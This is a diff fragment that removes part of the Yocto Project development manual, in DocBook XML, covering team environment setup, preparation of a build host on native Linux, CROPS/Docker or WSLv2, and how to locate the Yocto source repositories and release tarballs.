-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Core System Developer:</emphasis>
-                            This type of developer works on the contents of the
-                            operating system image itself.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Build Engineer:</emphasis>
-                            This type of developer manages Autobuilders and
-                            releases. Depending on the specifics of the environment,
-                            not all situations might need a Build Engineer.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Test Engineer:</emphasis>
-                            This type of developer creates and manages automated
-                            tests that are used to ensure all application and
-                            core system development meets desired quality
-                            standards.
-                            </para></listitem>
-                    </itemizedlist>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Gather the Hardware:</emphasis>
-                Based on the size and make-up of the team, get the hardware
-                together.
-                Ideally, any development, build, or test engineer uses
-                a system that runs a supported Linux distribution.
-                These systems, in general, should be high performance
-                (e.g. dual, six-core Xeons with 24 Gbytes of RAM and plenty
-                of disk space).
-                You can help ensure efficiency by having any machines used
-                for testing or that run Autobuilders be as high performance
-                as possible.
-                <note>
-                    Given sufficient processing power, you might also consider
-                    building Yocto Project development containers to be run
-                    under Docker, which is described later.
-                </note>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Understand the Hardware Topology of the Environment:</emphasis>
-                Once you understand the hardware involved and the make-up
-                of the team, you can understand the hardware topology of the
-                development environment.
-                You can get a visual idea of the machines and their roles
-                across the development environment.
-
-<!--
-                The following figure shows a moderately sized Yocto Project
-                development environment.
-
-                <para role="writernotes">
-                Need figure.</para>
--->
-
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Use Git as Your Source Control Manager (SCM):</emphasis>
-                Keeping your
-                <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
-                (i.e. recipes, configuration files, classes, and so forth)
-                and any software you are developing under the control of an SCM
-                system that is compatible   with the OpenEmbedded build system
-                is advisable.
-                Of all of the SCMs supported by BitBake, the Yocto Project team strongly
-                recommends using
-                <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>.
-                Git is a distributed system that is easy to back up,
-                allows you to work remotely, and then connects back to the
-                infrastructure.
-                <note>
-                    For information about BitBake, see the
-                    <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-                </note></para>
-
-                <para>It is relatively easy to set up Git services and create
-                infrastructure like
-                <ulink url='&YOCTO_GIT_URL;'>http://git.yoctoproject.org</ulink>,
-                which is based on server software called
-                <filename>gitolite</filename> with <filename>cgit</filename>
-                being used to generate the web interface that lets you view the
-                repositories.
-                The <filename>gitolite</filename> software identifies users
-                using SSH keys and allows branch-based access controls to
-                repositories that you can control as little or as much as
-                necessary.
-                <note>
-                   The setup of these services is beyond the scope of this
-                   manual.
-                   However, sites such as the following exist that describe
-                   how to perform setup:
-                   <itemizedlist>
-                       <listitem><para>
-                           <ulink url='http://git-scm.com/book/ch4-8.html'>Git documentation</ulink>:
-                           Describes how to install
-                           <filename>gitolite</filename> on the server.
-                           </para></listitem>
-                       <listitem><para>
-                           <ulink url='http://gitolite.com'>Gitolite</ulink>:
-                            Information for <filename>gitolite</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='https://git.wiki.kernel.org/index.php/Interfaces,_frontends,_and_tools'>Interfaces, frontends, and tools</ulink>:
-                            Documentation on how to create interfaces and
-                            frontends for Git.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Set up the Application Development Machines:</emphasis>
-                As mentioned earlier, application developers are creating
-                applications on top of existing software stacks.
-                Following are some best practices for setting up machines
-                used for application development:
-                <itemizedlist>
-                    <listitem><para>
-                        Use a pre-built toolchain that contains the software
-                        stack itself.
-                        Then, develop the application code on top of the
-                        stack.
-                        This method works well for small numbers of relatively
-                        isolated applications.
-                        </para></listitem>
-                    <listitem><para>
-                        Keep your cross-development toolchains updated.
-                        You can do this through provisioning either as new
-                        toolchain downloads or as updates through a package
-                        update mechanism using <filename>opkg</filename>
-                        to provide updates to an existing toolchain.
-                        The exact mechanics of how and when to do this depend
-                        on local policy.
-                        </para></listitem>
-                    <listitem><para>
-                        Use multiple toolchains installed locally into
-                        different locations to allow development across
-                        versions.
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Set up the Core Development Machines:</emphasis>
-                As mentioned earlier, core developers work on the contents of
-                the operating system itself.
-                Following are some best practices for setting up machines
-                used for developing images:
-                <itemizedlist>
-                    <listitem><para>
-                        Have the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-                        available on the developer workstations so developers
-                        can run their own builds and directly rebuild the
-                        software stack.
-                        </para></listitem>
-                    <listitem><para>
-                        Keep the core system unchanged as much as
-                        possible and do your work in layers on top of the
-                        core system.
-                        Doing so gives you a greater level of portability when
-                        upgrading to new versions of the core system or Board
-                        Support Packages (BSPs).
-                        </para></listitem>
-                    <listitem><para>
-                        Share layers amongst the developers of a
-                        particular project and contain the policy configuration
-                        that defines the project.
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Set up an Autobuilder:</emphasis>
-                Autobuilders are often the core of the development
-                environment.
-                It is here that changes from individual developers are brought
-                together and centrally tested.
-                Based on this automated build and test environment, subsequent
-                decisions about releases can be made.
-                Autobuilders also allow for "continuous integration" style
-                testing of software components and regression identification
-                and tracking.</para>
-
-                <para>See "<ulink url='http://autobuilder.yoctoproject.org'>Yocto Project Autobuilder</ulink>"
-                for more information and links to buildbot.
-                The Yocto Project team has found this implementation
-                works well in this role.
-                A public example of this is the Yocto Project
-                Autobuilders, which the Yocto Project team uses to test the
-                overall health of the project.</para>
-
-                <para>The features of this system are:
-                <itemizedlist>
-                    <listitem><para>
-                        Highlights when commits break the build.
-                        </para></listitem>
-                    <listitem><para>
-                        Populates an
-                        <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate cache</ulink>
-                        from which developers can pull rather than requiring
-                        local builds.
-                        </para></listitem>
-                    <listitem><para>
-                        Allows commit hook triggers, which trigger builds when
-                        commits are made.
-                        </para></listitem>
-                    <listitem><para>
-                        Allows triggering of automated image booting
-                        and testing under the QuickEMUlator (QEMU).
-                        </para></listitem>
-                    <listitem><para>
-                        Supports incremental build testing and
-                        from-scratch builds.
-                        </para></listitem>
-                    <listitem><para>
-                        Shares output that allows developer
-                        testing and historical regression investigation.
-                        </para></listitem>
-                    <listitem><para>
-                        Creates output that can be used for releases.
-                        </para></listitem>
-                    <listitem><para>
-                        Allows scheduling of builds so that resources
-                        can be used efficiently.
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Set up Test Machines:</emphasis>
-                Use a small number of shared, high performance systems
-                for testing purposes.
-                Developers can use these systems for wider, more
-                extensive testing while they continue to develop
-                locally using their primary development system.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Document Policies and Change Flow:</emphasis>
-                The Yocto Project uses a hierarchical structure and a
-                pull model.
-                Scripts exist to create and send pull requests
-                (i.e. <filename>create-pull-request</filename> and
-                <filename>send-pull-request</filename>).
-                This model is in line with other open source projects where
-                maintainers are responsible for specific areas of the project
-                and a single maintainer handles the final "top-of-tree" merges.
-                <note>
-                    You can also use a more collective push model.
-                    The <filename>gitolite</filename> software supports both the
-                    push and pull models quite easily.
-                </note></para>
-
-                <para>As with any development environment, it is important
-                to document the policy used as well as any main project
-                guidelines so they are understood by everyone.
-                It is also a good idea to have well-structured
-                commit messages, which are usually a part of a project's
-                guidelines.
-                Good commit messages are essential when looking back in time and
-                trying to understand why changes were made.</para>
-
-                <para>If you discover that changes are needed to the core
-                layer of the project, it is worth sharing those with the
-                community as soon as possible.
-                Chances are if you have discovered the need for changes,
-                someone else in the community needs them also.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Development Environment Summary:</emphasis>
-                Aside from the previous steps, some best practices exist
-                within the Yocto Project development environment.
-                Consider the following:
-                <itemizedlist>
-                    <listitem><para>
-                        Use
-                        <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>
-                        as the source control system.
-                        </para></listitem>
-                    <listitem><para>
-                        Maintain your Metadata in layers that make sense
-                        for your situation.
-                        See the
-                        "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
-                        section in the Yocto Project Overview and Concepts
-                        Manual and the
-                        "<link linkend='understanding-and-creating-layers'>Understanding and Creating Layers</link>"
-                        section for more information on layers.
-                        </para></listitem>
-                    <listitem><para>
-                        Separate the project's Metadata and code by using
-                        separate Git repositories.
-                        See the
-                        "<ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>"
-                        section in the Yocto Project Overview and Concepts
-                        Manual for information on these repositories.
-                        See the
-                        "<link linkend='locating-yocto-project-source-files'>Locating Yocto Project Source Files</link>"
-                        section for information on how to set up local Git
-                        repositories for related upstream Yocto Project
-                        Git repositories.
-                        </para></listitem>
-                    <listitem><para>
-                        Set up the directory for the shared state cache
-                        (<ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>)
-                        where it makes sense.
-                        For example, set up the sstate cache on a system used
-                        by developers in the same organization and share the
-                        same source directories on their machines.
-                        </para></listitem>
-                    <listitem><para>
-                        Set up an Autobuilder and have it populate the
-                        sstate cache and source directories.
-                        </para></listitem>
-                    <listitem><para>
-                        The Yocto Project community encourages you
-                        to send patches to the project to fix bugs or add
-                        features.
-                        If you do submit patches, follow the project commit
-                        guidelines for writing good commit messages.
-                        See the "<link linkend='how-to-submit-a-change'>Submitting a Change to the Yocto Project</link>"
-                        section.
-                        </para></listitem>
-                    <listitem><para>
-                        Send changes to the core sooner than later
-                        as others are likely to run into the same issues.
-                        For some guidance on mailing lists to use, see the list
-                        in the
-                        "<link linkend='how-to-submit-a-change'>Submitting a Change to the Yocto Project</link>"
-                        section.
-                        For a description of the available mailing lists, see
-                        the
-                        "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing Lists</ulink>"
-                        section in the Yocto Project Reference Manual.
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id='dev-preparing-the-build-host'>
-    <title>Preparing the Build Host</title>
-
-    <para>
-        This section provides procedures to set up a system to be used as your
-        <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
-        for development using the Yocto Project.
-        Your build host can be a native Linux machine (recommended), it can
-        be a machine (Linux, Mac, or Windows) that uses
-        <ulink url='https://github.com/crops/poky-container'>CROPS</ulink>,
-        which leverages
-        <ulink url='https://www.docker.com/'>Docker Containers</ulink> or it can
-        be a Windows machine capable of running Windows Subsystem For Linux v2 (WSL).
-        <note>
-          The Yocto Project is not compatible with
-          <ulink url='https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux'>Windows Subsystem for Linux v1</ulink>.
-          It is compatible but not officially supported nor validated with WSLv2.
-          If you still decide to use WSL please upgrade to
-          <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-install'>WSLv2</ulink>.
-        </note>
-    </para>
-
-    <para>
-        Once your build host is set up to use the Yocto Project,
-        further steps are necessary depending on what you want to
-        accomplish.
-        See the following references for information on how to prepare for
-        Board Support Package (BSP) development and kernel development:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>BSP Development:</emphasis>
-                See the
-                "<ulink url='&YOCTO_DOCS_BSP_URL;#preparing-your-build-host-to-work-with-bsp-layers'>Preparing Your Build Host to Work With BSP Layers</ulink>"
-                section in the Yocto Project Board Support Package (BSP)
-                Developer's Guide.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Kernel Development:</emphasis>
-                See the
-                "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</ulink>"
-                section in the Yocto Project Linux Kernel Development Manual.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <section id='setting-up-a-native-linux-host'>
-        <title>Setting Up a Native Linux Host</title>
-
-        <para>
-            Follow these steps to prepare a native Linux machine as your
-            Yocto Project Build Host:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Use a Supported Linux Distribution:</emphasis>
-                    You should have a reasonably current Linux-based host
-                    system.
-                    You will have the best results with a recent release of
-                    Fedora, openSUSE, Debian, Ubuntu, RHEL or CentOS as these
-                    releases are frequently tested against the Yocto Project
-                    and officially supported.
-                    For a list of the distributions under validation and their
-                    status, see the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#detailed-supported-distros'>Supported Linux Distributions</ulink>" section
-                    in the Yocto Project Reference Manual and the wiki page at
-                    <ulink url='&YOCTO_WIKI_URL;/wiki/Distribution_Support'>Distribution Support</ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Have Enough Free Memory:</emphasis>
-                    Your system should have at least 50 Gbytes of free disk
-                    space for building images.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Meet Minimal Version Requirements:</emphasis>
-                    The OpenEmbedded build system should be able to run on any
-                    modern distribution that has the following versions for
-                    Git, tar, Python and gcc.
-                    <itemizedlist>
-                        <listitem><para>
-                            Git 1.8.3.1 or greater
-                            </para></listitem>
-                        <listitem><para>
-                            tar 1.28 or greater
-                            </para></listitem>
-                        <listitem><para>
-                            Python 3.5.0 or greater.
-                        </para></listitem>
-                        <listitem><para>
-                            gcc 5.0 or greater.
-                        </para></listitem>
-                    </itemizedlist>
-                    If your build host does not meet any of these three listed
-                    version requirements, you can take steps to prepare the
-                    system so that you can still use the Yocto Project.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</ulink>"
-                    section in the Yocto Project Reference Manual for
-                    information.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Install Development Host Packages:</emphasis>
-                    Required development host packages vary depending on your
-                    build host and what you want to do with the Yocto
-                    Project.
-                    Collectively, the number of required packages is large
-                    if you want to be able to cover all cases.</para>
-
-                    <para>For lists of required packages for all scenarios,
-                    see the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-build-host'>Required Packages for the Build Host</ulink>"
-                    section in the Yocto Project Reference Manual.
-                    </para></listitem>
-            </orderedlist>
-            Once you have completed the previous steps, you are ready to
-            continue using a given development path on your native Linux
-            machine.
-            If you are going to use BitBake, see the
-            "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
-            section.
-            If you are going to use the Extensible SDK, see the
-            "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
-            Chapter in the Yocto Project Application Development and the
-            Extensible Software Development Kit (eSDK) manual.
-            If you want to work on the kernel, see the
-            <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;'>Yocto Project Linux Kernel Development Manual</ulink>.
-            If you are going to use Toaster, see the
-            "<ulink url='&YOCTO_DOCS_TOAST_URL;#toaster-manual-setup-and-use'>Setting Up and Using Toaster</ulink>"
-            section in the Toaster User Manual.
-        </para>
-    </section>
-
-    <section id='setting-up-to-use-crops'>
-        <title>Setting Up to Use CROss PlatformS (CROPS)</title>
-
-        <para>
-            With
-            <ulink url='https://github.com/crops/poky-container'>CROPS</ulink>,
-            which leverages
-            <ulink url='https://www.docker.com/'>Docker Containers</ulink>,
-            you can create a Yocto Project development environment that
-            is operating system agnostic.
-            You can set up a container in which you can develop using the
-            Yocto Project on a Windows, Mac, or Linux  machine.
-        </para>
-
-        <para>
-            Follow these general steps to prepare a Windows, Mac, or Linux
-            machine as your Yocto Project build host:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Determine What Your Build Host Needs:</emphasis>
-                    <ulink url='https://www.docker.com/what-docker'>Docker</ulink>
-                    is a software container platform that you need to install
-                    on the build host.
-                    Depending on your build host, you might have to install
-                    different software to support Docker containers.
-                    Go to the Docker installation page and read about the
-                    platform requirements in
-                    "<ulink url='https://docs.docker.com/install/#supported-platforms'>Supported Platforms</ulink>"
-                    your build host needs to run containers.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Choose What To Install:</emphasis>
-                    Depending on whether or not your build host meets system
-                    requirements, you need to install "Docker CE Stable" or
-                    the "Docker Toolbox".
-                    Most situations call for Docker CE.
-                    However, if you have a build host that does not meet
-                    requirements (e.g. Pre-Windows 10 or Windows 10 "Home"
-                    version), you must install Docker Toolbox instead.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Go to the Install Site for Your Platform:</emphasis>
-                    Click the link for the Docker edition associated with
-                    your build host's native software.
-                    For example, if your build host is running Microsoft
-                    Windows Version 10 and you want the Docker CE Stable
-                    edition, click that link under "Supported Platforms".
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Install the Software:</emphasis>
-                    Once you have understood all the pre-requisites, you can
-                    download and install the appropriate software.
-                    Follow the instructions for your specific machine and
-                    the type of the software you need to install:
-                    <itemizedlist>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/docker-for-windows/install/#install-docker-for-windows-desktop-app'>Docker CE for Windows</ulink>
-                            for Windows build hosts that meet requirements.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/docker-for-mac/install/#install-and-run-docker-for-mac'>Docker CE for Macs</ulink>
-                            for Mac build hosts that meet requirements.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/toolbox/toolbox_install_windows/'>Docker Toolbox for Windows</ulink>
-                            for Windows build hosts that do not meet Docker
-                            requirements.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/toolbox/toolbox_install_mac/'>Docker Toolbox for MacOS</ulink>
-                            for Mac build hosts that do not meet Docker
-                            requirements.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/install/linux/docker-ce/centos/'>Docker CE for CentOS</ulink>
-                            for Linux build hosts running the CentOS
-                            distribution.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/install/linux/docker-ce/debian/'>Docker CE for Debian</ulink>
-                            for Linux build hosts running the Debian
-                            distribution.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/install/linux/docker-ce/fedora/'>Docker CE for Fedora</ulink>
-                            for Linux build hosts running the Fedora
-                            distribution.
-                            </para></listitem>
-                        <listitem><para>
-                            Install
-                            <ulink url='https://docs.docker.com/install/linux/docker-ce/ubuntu/'>Docker CE for Ubuntu</ulink>
-                            for Linux build hosts running the Ubuntu
-                            distribution.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Optionally Orient Yourself With Docker:</emphasis>
-                    If you are unfamiliar with Docker and the container
-                    concept, you can learn more here -
-                    <ulink url='https://docs.docker.com/get-started/'></ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Launch Docker or Docker Toolbox:</emphasis>
-                    You should be able to launch Docker or the Docker Toolbox
-                    and have a terminal shell on your development host.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Set Up the Containers to Use the Yocto Project:</emphasis>
-                    Go to
-                    <ulink url='https://github.com/crops/docker-win-mac-docs/wiki'></ulink>
-                    and follow the directions for your particular
-                    build host (i.e. Linux, Mac, or Windows).</para>
-
-                    <para>Once you complete the setup instructions for your
-                    machine, you have the Poky, Extensible SDK, and Toaster
-                    containers available.
-                    You can click those links from the page and learn more
-                    about using each of those containers.
-                    </para></listitem>
-            </orderedlist>
-            Once you have a container set up, everything is in place to
-            develop just as if you were running on a native Linux machine.
-            If you are going to use the Poky container, see the
-            "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
-            section.
-            If you are going to use the Extensible SDK container, see the
-            "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
-            Chapter in the Yocto Project Application Development and the
-            Extensible Software Development Kit (eSDK) manual.
-            If you are going to use the Toaster container, see the
-            "<ulink url='&YOCTO_DOCS_TOAST_URL;#toaster-manual-setup-and-use'>Setting Up and Using Toaster</ulink>"
-            section in the Toaster User Manual.
-        </para>
-    </section>
-
-    <section id='setting-up-to-use-wsl'>
-        <title>Setting Up to Use Windows Subsystem For Linux (WSLv2)</title>
-
-        <para>
-            With <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-about'>
-            Windows Subsystem for Linux (WSLv2)</ulink>, you can create a
-            Yocto Project development environment that allows you to build
-            on Windows. You can set up a Linux distribution inside Windows
-            in which you can develop using the Yocto Project.
-        </para>
-
-        <para>
-            Follow these general steps to prepare a Windows machine using WSLv2
-            as your Yocto Project build host:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Make sure your Windows 10 machine is capable of running WSLv2:</emphasis>
-                  
-                    WSLv2 is only available for Windows 10 builds > 18917. To
-                    check which build version you are running, you may open a
-                    command prompt on Windows and execute the command "ver".
-                    <literallayout class='monospaced'>
-    C:\Users\myuser> ver
-
-    Microsoft Windows [Version 10.0.19041.153]
-                    </literallayout>
-                    If your build is capable of running WSLv2 you may continue,
-                    for more information on this subject or instructions on how
-                    to upgrade to WSLv2 visit <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-install'>Windows 10 WSLv2</ulink>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Install the Linux distribution of your choice inside Windows 10:</emphasis>
-                    Once you know your version of Windows 10 supports WSLv2,
-                    you can install the distribution of your choice from the
-                    Microsoft Store.
-                    Open the Microsoft Store and search for Linux. While there
-                    are several Linux distributions available, the assumption
-                    is that your pick will be one of the distributions supported
-                    by the Yocto Project as stated on the instructions for
-                    using a native Linux host.
-                    After making your selection, simply click "Get" to download
-                    and install the distribution.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Check your Linux distribution is using WSLv2:</emphasis>
-                    Open a Windows PowerShell and run:
-                    <literallayout class='monospaced'>
-    C:\WINDOWS\system32> wsl -l -v
-    NAME      STATE           VERSION
-    *Ubuntu    Running         2
-                    </literallayout>
-                    Note the version column which says the WSL version being used by
-                    your distribution, on compatible systems, this can be changed back
-                    at any point in time.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Optionally Orient Yourself on WSL:</emphasis>
-                    If you are unfamiliar with WSL, you can learn more here -
-                    <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-about'></ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Launch your WSL Distibution:</emphasis>
-                    From the Windows start menu simply launch your WSL distribution
-                    just like any other application.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Optimize your WSLv2 storage often:</emphasis>
-                    Due to the way storage is handled on WSLv2, the storage
-                    space used by the undelying Linux distribution is not
-                    reflected immedately, and since bitbake heavily uses
-                    storage, after several builds, you may be unaware you
-                    are running out of space. WSLv2 uses a VHDX file for
-                    storage, this issue can be easily avoided by manually
-                    optimizing this file often, this can be done in the
-                    following way:
-                    <orderedlist>
-                        <listitem><para>
-                            <emphasis>Find the location of your VHDX file:</emphasis>
-                            First you need to find the distro app package directory,
-                            to achieve this open a Windows Powershell as Administrator
-                            and run:
-                            <literallayout class='monospaced'>
-    C:\WINDOWS\system32> Get-AppxPackage -Name "*Ubuntu*" | Select PackageFamilyName
-    PackageFamilyName
-    -----------------
-    CanonicalGroupLimited.UbuntuonWindows_79abcdefgh
-                            </literallayout>
-                            You should now replace the <replaceable>PackageFamilyName</replaceable>
-                            and your <replaceable>user</replaceable> on the following
-                            path to find your VHDX file: <filename>C:\Users\user\AppData\Local\Packages\PackageFamilyName\LocalState\</filename>
-                            For example:
-                            <literallayout class='monospaced'>
-    ls C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\
-    Mode                 LastWriteTime         Length Name
-    -a----         3/14/2020   9:52 PM    57418973184 ext4.vhdx                      
-                            </literallayout>
-                            Your VHDX file path is: <filename>C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx</filename>
-                            </para></listitem>
-                        <listitem><para><emphasis>Optimize your VHDX file:</emphasis>
-                            Open a Windows Powershell as Administrator to optimize
-                            your VHDX file, shutting down WSL first:
-                            <literallayout class='monospaced'>
-    C:\WINDOWS\system32> wsl --shutdown
-    C:\WINDOWS\system32> optimize-vhd -Path C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx -Mode full
-                            </literallayout>
-                            A progress bar should be shown while optimizing the VHDX file,
-                            and storage should now be reflected correctly on the Windows
-                            Explorer.
-                            </para></listitem>
-                    </orderedlist>
-                </para></listitem>
-            </orderedlist>
-            <note>
-              The current implementation of WSLv2 does not have out-of-the-box
-              access to external devices such as those connected through a
-              USB port, but it automatically mounts your <filename>C:</filename>
-              drive on <filename>/mnt/c/</filename> (and others), which
-              you can use to share deploy artifacts to be later flashed on
-              hardware through Windows, but your build directory should not
-              reside inside this mountpoint.
-            </note>
-            Once you have WSLv2 set up, everything is in place to
-            develop just as if you were running on a native Linux machine.
-            If you are going to use the Extensible SDK container, see the
-            "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
-            Chapter in the Yocto Project Application Development and the
-            Extensible Software Development Kit (eSDK) manual.
-            If you are going to use the Toaster container, see the
-            "<ulink url='&YOCTO_DOCS_TOAST_URL;#toaster-manual-setup-and-use'>Setting Up and Using Toaster</ulink>"
-            section in the Toaster User Manual.
-        </para>
-    </section>
-</section>
-
-<section id='locating-yocto-project-source-files'>
-    <title>Locating Yocto Project Source Files</title>
-
-    <para>
-        This section shows you how to locate, fetch and configure the source
-        files you'll need to work with the Yocto Project.
-        <note><title>Notes</title>
-            <itemizedlist>
-                <listitem><para>
-                    For concepts and introductory information about Git as it
-                    is used in the Yocto Project, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                    </para></listitem>
-                <listitem><para>
-                    For concepts on Yocto Project source repositories, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual."
-                    </para></listitem>
-            </itemizedlist>
-        </note>
-    </para>
-
-    <section id='accessing-source-repositories'>
-        <title>Accessing Source Repositories</title>
-
-        <para>
-            Working from a copy of the upstream Yocto Project
-            <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-            is the preferred method for obtaining and using a Yocto Project
-            release.
-            You can view the Yocto Project Source Repositories at
-            <ulink url='&YOCTO_GIT_URL;'></ulink>.
-            In particular, you can find the
-            <filename>poky</filename> repository at
-            <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/'></ulink>.
-        </para>
-
-        <para>
-            Use the following procedure to locate the latest upstream copy of
-            the <filename>poky</filename> Git repository:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Access Repositories:</emphasis>
-                    Open a browser and go to
-                    <ulink url='&YOCTO_GIT_URL;'></ulink> to access the
-                    GUI-based interface into the Yocto Project source
-                    repositories.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Select the Repository:</emphasis>
-                    Click on the repository in which you are interested (e.g.
-                    <filename>poky</filename>).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Find the URL Used to Clone the Repository:</emphasis>
-                    At the bottom of the page, note the URL used to
-                    <ulink url='&YOCTO_DOCS_OM_URL;#git-commands-clone'>clone</ulink>
-                    that repository (e.g.
-                    <filename>&YOCTO_GIT_URL;/poky</filename>).
-                    <note>
-                        For information on cloning a repository, see the
-                        "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
-                        section.
-                    </note>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='accessing-index-of-releases'>
-        <title>Accessing Index of Releases</title>
-
-        <para>
-            Yocto Project maintains an Index of Releases area that contains
-            related files that contribute to the Yocto Project.
-            Rather than Git repositories, these files are tarballs that
-            represent snapshots in time of a given component.
-            <note><title>Tip</title>
-                The recommended method for accessing Yocto Project
-                components is to use Git to clone the upstream repository and
-                work from within that locally cloned repository.
-                The procedure in this section exists should you desire a
-                tarball snapshot of any given component.
-            </note>
-            Follow these steps to locate and download a particular tarball:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Access the Index of Releases:</emphasis>
-                    Open a browser and go to
-                    <ulink url='&YOCTO_DL_URL;/releases'></ulink> to access the
-                    Index of Releases.
-                    The list represents released components (e.g.
-                    <filename>bitbake</filename>,
-                    <filename>sato</filename>, and so on).
-                    <note>
-                        The <filename>yocto</filename> directory contains the
-                        full array of released Poky tarballs.
-                        The <filename>poky</filename> directory in the
-                        Index of Releases was historically used for very
-                        early releases and exists now only for retroactive
-                        completeness.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Select a Component:</emphasis>
-                    Click on any released component in which you are interested
-                    (e.g. <filename>yocto</filename>).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Find the Tarball:</emphasis>
-                    Drill down to find the associated tarball.
-                    For example, click on <filename>yocto-&DISTRO;</filename> to
-                    view files associated with the Yocto Project &DISTRO;
-                    release (e.g. <filename>poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;.tar.bz2</filename>,
